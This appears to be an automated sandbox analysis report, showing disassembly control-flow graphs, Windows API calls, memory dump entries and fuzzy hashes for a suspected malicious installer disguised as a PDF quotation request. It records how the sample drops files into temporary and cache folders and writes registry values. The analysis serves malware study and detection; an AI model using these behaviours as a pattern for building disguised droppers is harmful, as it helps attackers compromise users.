                                                                                                                                  control_flow_graph 892 403027-40303e 893 403040 892->893 894 403047-403050 892->894 893->894 895 403052 894->895 896 403059-40305e 894->896 895->896 897 403060-403069 call 403258 896->897 898 40306e-40307b call 403242 896->898 897->898 902 403230 898->902 903 403081-403085 898->903 904 403232-403233 902->904 905 4031db-4031dd 903->905 906 40308b-4030d4 GetTickCount 903->906 909 40323b-40323f 904->909 907 40321d-403220 905->907 908 4031df-4031e2 905->908 910 403238 906->910 911 4030da-4030e2 906->911 912 403222 907->912 913 403225-40322e call 403242 907->913 908->910 914 4031e4 908->914 910->909 915 4030e4 911->915 916 4030e7-4030f5 call 403242 911->916 912->913 913->902 925 403235 913->925 918 4031e7-4031ed 914->918 915->916 916->902 924 4030fb-403104 916->924 921 4031f1-4031ff call 403242 918->921 922 4031ef 918->922 921->902 930 403201-40320d call 405cdc 921->930 922->921 927 40310a-40312a call 40654a 924->927 925->910 934 403130-403143 GetTickCount 927->934 935 4031d3-4031d5 927->935 936 4031d7-4031d9 930->936 937 40320f-403219 930->937 938 403145-40314d 934->938 939 40318e-403190 934->939 935->904 936->904 937->918 940 40321b 937->940 941 403155-40318b MulDiv wsprintfW call 4051b4 938->941 942 40314f-403153 938->942 943 403192-403196 939->943 944 4031c7-4031cb 939->944 940->910 941->939 942->939 942->941 947 403198-40319f call 405cdc 943->947 948 4031ad-4031b8 943->948 944->911 945 4031d1 944->945 945->910 953 4031a4-4031a6 947->953 949 4031bb-4031bf 948->949 949->927 952 4031c5 949->952 952->910 953->936 954 4031a8-4031ab 953->954 954->949
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick$wsprintf
                                                                                                                                  • String ID: jA$ jA$... %d%%
                                                                                                                                  • API String ID: 551687249-2167919867
                                                                                                                                  • Opcode ID: d6d85bbee09884fc6a4e27a5c727532f93391e72c67541d57332e7913648c049
                                                                                                                                  • Instruction ID: 9abceb1f43df10d1a821086e1d45a58eca4464abfa5f2a46825b956852eb5d51
                                                                                                                                  • Opcode Fuzzy Hash: d6d85bbee09884fc6a4e27a5c727532f93391e72c67541d57332e7913648c049
                                                                                                                                  • Instruction Fuzzy Hash: AF517C71901259EBDB10CF65DA44BAE7BB8AF05766F10417FF811B62C0C7789E40CBAA

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 955 4025e5-4025fa call 402ba2 958 402600-402607 955->958 959 402a4c-402a4f 955->959 960 402609 958->960 961 40260c-40260f 958->961 962 402a55-402a5b 959->962 960->961 963 402773-40277b 961->963 964 402615-402624 call 405fb5 961->964 963->959 964->963 968 40262a 964->968 969 402630-402634 968->969 970 4026c9-4026cc 969->970 971 40263a-402655 ReadFile 969->971 972 4026e4-4026f4 call 405cad 970->972 973 4026ce-4026d1 970->973 971->963 974 40265b-402660 971->974 972->963 984 4026f6 972->984 973->972 975 4026d3-4026de call 405d0b 973->975 974->963 977 402666-402674 974->977 975->963 975->972 980 40267a-40268c MultiByteToWideChar 977->980 981 40272f-40273b call 405f9c 977->981 980->984 985 40268e-402691 980->985 981->962 987 4026f9-4026fc 984->987 988 402693-40269e 985->988 987->981 989 4026fe-402703 987->989 988->987 990 4026a0-4026c5 SetFilePointer MultiByteToWideChar 988->990 992 402740-402744 989->992 993 402705-40270a 989->993 990->988 991 4026c7 990->991 991->984 994 402761-40276d SetFilePointer 992->994 995 402746-40274a 992->995 993->992 996 40270c-40271f 993->996 994->963 997 402752-40275f 995->997 998 40274c-402750 995->998 996->963 999 402721-402727 996->999 997->963 998->994 998->997 999->969 1000 40272d 999->1000 1000->963
                                                                                                                                  APIs
                                                                                                                                  • ReadFile.KERNELBASE(?,?,?,?), ref: 0040264D
                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                                                                                                  • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                                                                                                    • Part of subcall function 00405D0B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405D21
                                                                                                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                  • String ID: 9
                                                                                                                                  • API String ID: 163830602-2366072709
                                                                                                                                  • Opcode ID: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                                                  • Instruction ID: c11c119823ef092d14edb4d445d1eebecf1e4ba29e3308019af08aa6c5ad61e3
                                                                                                                                  • Opcode Fuzzy Hash: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                                                  • Instruction Fuzzy Hash: 43510874D00219AADF209F94CA88ABEB779FF04344F50447BE501B72E0D7B99D42DB69

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1001 40237b-4023c1 call 402cb4 call 402bbf * 2 RegCreateKeyExW 1008 4023c7-4023cf 1001->1008 1009 402a4c-402a5b 1001->1009 1011 4023d1-4023de call 402bbf lstrlenW 1008->1011 1012 4023e2-4023e5 1008->1012 1011->1012 1013 4023f5-4023f8 1012->1013 1014 4023e7-4023f4 call 402ba2 1012->1014 1019 402409-40241d RegSetValueExW 1013->1019 1020 4023fa-402404 call 403027 1013->1020 1014->1013 1023 402422-4024fc RegCloseKey 1019->1023 1024 40241f 1019->1024 1020->1019 1023->1009 1026 40281e-402825 1023->1026 1024->1023 1026->1009
                                                                                                                                  APIs
                                                                                                                                  • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                                                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsb13EA.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                                                                  • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsb13EA.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsb13EA.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreateValuelstrlen
                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsb13EA.tmp
                                                                                                                                  • API String ID: 1356686001-2503862991
                                                                                                                                  • Opcode ID: 16ccbc1a4839035df8dee6c69b1955b51d84c24cc9eb413e0f302de5cc057626
                                                                                                                                  • Instruction ID: e0a93677b1043ce4e8fea40acd1fa81b7363c56b112b112c42ce1ea238d19e9d
                                                                                                                                  • Opcode Fuzzy Hash: 16ccbc1a4839035df8dee6c69b1955b51d84c24cc9eb413e0f302de5cc057626
                                                                                                                                  • Instruction Fuzzy Hash: 87118E71A00108BFEB10AFA5DE89EAEB67DEB44358F11403AF904B61D1D7B85E409668

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1027 405683-4056ce CreateDirectoryW 1028 4056d0-4056d2 1027->1028 1029 4056d4-4056e1 GetLastError 1027->1029 1030 4056fb-4056fd 1028->1030 1029->1030 1031 4056e3-4056f7 SetFileSecurityW 1029->1031 1031->1028 1032 4056f9 GetLastError 1031->1032 1032->1030
                                                                                                                                  APIs
                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user\AppData\Local\Temp\), ref: 004056C6
                                                                                                                                  • GetLastError.KERNEL32 ref: 004056DA
                                                                                                                                  • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EF
                                                                                                                                  • GetLastError.KERNEL32 ref: 004056F9
                                                                                                                                  Strings
                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004056A9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                  • API String ID: 3449924974-823278215
                                                                                                                                  • Opcode ID: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                                                  • Instruction ID: b9d54522e8c2a6a11acfe34e4faeeda892d25e5cd719c7a25251d408d6c76708
                                                                                                                                  • Opcode Fuzzy Hash: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                                                  • Instruction Fuzzy Hash: C8011A71D00619DBDF009FA0CA487EFBBB8EF14315F50443AD549B6190E7799604CFA9

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1033 10001759-10001795 call 10001b18 1037 100018a6-100018a8 1033->1037 1038 1000179b-1000179f 1033->1038 1039 100017a1-100017a7 call 10002286 1038->1039 1040 100017a8-100017b5 call 100022d0 1038->1040 1039->1040 1045 100017e5-100017ec 1040->1045 1046 100017b7-100017bc 1040->1046 1047 1000180c-10001810 1045->1047 1048 100017ee-1000180a call 100024a9 call 100015b4 call 10001272 GlobalFree 1045->1048 1049 100017d7-100017da 1046->1049 1050 100017be-100017bf 1046->1050 1054 10001812-1000184c call 100015b4 call 100024a9 1047->1054 1055 1000184e-10001854 call 100024a9 1047->1055 1070 10001855-10001859 1048->1070 1049->1045 1056 100017dc-100017dd call 10002b5f 1049->1056 1052 100017c1-100017c2 1050->1052 1053 100017c7-100017c8 call 100028a4 1050->1053 1058 100017c4-100017c5 1052->1058 1059 100017cf-100017d5 call 10002645 1052->1059 1065 100017cd 1053->1065 1054->1070 1055->1070 1068 100017e2 1056->1068 1058->1045 1058->1053 1074 100017e4 1059->1074 1065->1068 1068->1074 1075 10001896-1000189d 1070->1075 1076 1000185b-10001869 call 1000246c 1070->1076 1074->1045 1075->1037 1081 1000189f-100018a0 GlobalFree 1075->1081 1083 10001881-10001888 1076->1083 1084 1000186b-1000186e 1076->1084 1081->1037 1083->1075 1086 1000188a-10001895 call 1000153d 1083->1086 1084->1083 1085 10001870-10001878 1084->1085 1085->1083 1087 1000187a-1000187b FreeLibrary 1085->1087 1086->1075 1087->1083
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                                                    • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                                                    • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                                                                                    • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8
                                                                                                                                    • Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                                                                                                    • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2534828695.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2534807173.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2534847436.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2534867013.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_10000000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1791698881-3916222277
                                                                                                                                  • Opcode ID: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                                                                                                  • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                                                                                                                  • Opcode Fuzzy Hash: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                                                                                                  • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1090 405c59-405c65 1091 405c66-405c9a GetTickCount GetTempFileNameW 1090->1091 1092 405ca9-405cab 1091->1092 1093 405c9c-405c9e 1091->1093 1095 405ca3-405ca6 1092->1095 1093->1091 1094 405ca0 1093->1094 1094->1095
                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00405C77
                                                                                                                                  • GetTempFileNameW.KERNELBASE(0040A300,?,00000000,?,?,?,00000000,0040329E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405C92
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountFileNameTempTick
                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                  • API String ID: 1716503409-44229769
                                                                                                                                  • Opcode ID: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                                                  • Instruction ID: f587d7e23cd8e79aba5dfcc9fd1c49406dd64d8aef4a88ed345cfe548f7336ea
                                                                                                                                  • Opcode Fuzzy Hash: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                                                  • Instruction Fuzzy Hash: BAF06D76A00708BFEB008B59ED05A9FBBA8EB91750F10403AE900F7180E6B49A548B68

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1096 4063bf-4063df GetSystemDirectoryW 1097 4063e1 1096->1097 1098 4063e3-4063e5 1096->1098 1097->1098 1099 4063f6-4063f8 1098->1099 1100 4063e7-4063f0 1098->1100 1102 4063f9-406428 wsprintfW LoadLibraryW 1099->1102 1100->1099 1101 4063f2-4063f4 1100->1101 1101->1102
                                                                                                                                  APIs
                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
                                                                                                                                  • wsprintfW.USER32 ref: 00406411
                                                                                                                                  • LoadLibraryW.KERNELBASE(?), ref: 00406421
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                  • String ID: %s%S.dll
                                                                                                                                  • API String ID: 2200240437-2744773210
                                                                                                                                  • Opcode ID: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                                                  • Instruction ID: 897e15d25a7328917349fb3201836a7725472686ce540cc24b04093dc9f4d60a
                                                                                                                                  • Opcode Fuzzy Hash: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                                                  • Instruction Fuzzy Hash: 81F0BB7051011997DB14AB68EE4DE9B366CEB00305F11447E9946F20D1EB7CDA69CBE8
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00405AB4: CharNextW.USER32(?,?,0042FA70,0040A300,00405B28,0042FA70,0042FA70,75923420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe"), ref: 00405AC2
                                                                                                                                    • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405AC7
                                                                                                                                    • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405ADF
                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
                                                                                                                                    • Part of subcall function 00405683: CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user\AppData\Local\Temp\), ref: 004056C6
                                                                                                                                  • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,?,00000000,000000F0), ref: 00401645
                                                                                                                                  Strings
                                                                                                                                  • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving, xrefs: 00401638
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving
                                                                                                                                  • API String ID: 1892508949-2989991106
                                                                                                                                  • Opcode ID: 52ccde5ccace11c1ffa7f9329ea0f8b807946ffbe1ca103446376b1a06abf216
                                                                                                                                  • Instruction ID: 2a65e9898054e9c842dee46b5c7982ab048171bb6952f998b4aca48d6bd22bb3
                                                                                                                                  • Opcode Fuzzy Hash: 52ccde5ccace11c1ffa7f9329ea0f8b807946ffbe1ca103446376b1a06abf216
                                                                                                                                  • Instruction Fuzzy Hash: 96119331504504EBCF20BFA4CD4599E36A1EF44368B25093BEA46B62F2DA394A819E5D
                                                                                                                                  APIs
                                                                                                                                  • IsWindowVisible.USER32(?), ref: 00405157
                                                                                                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 004051A8
                                                                                                                                    • Part of subcall function 00404165: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404177
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3748168415-3916222277
                                                                                                                                  • Opcode ID: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                                                  • Instruction ID: 0347cf6c5ba133ca8876b90c0990050b6d60b288702db1d6ba02f1018bbb4e5f
                                                                                                                                  • Opcode Fuzzy Hash: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                                                  • Instruction Fuzzy Hash: 4C017C71A00609ABDF214F51DD80FAB3B26EB84754F104036FA047E1E1C77A8C92DE69
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FEE
                                                                                                                                    • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
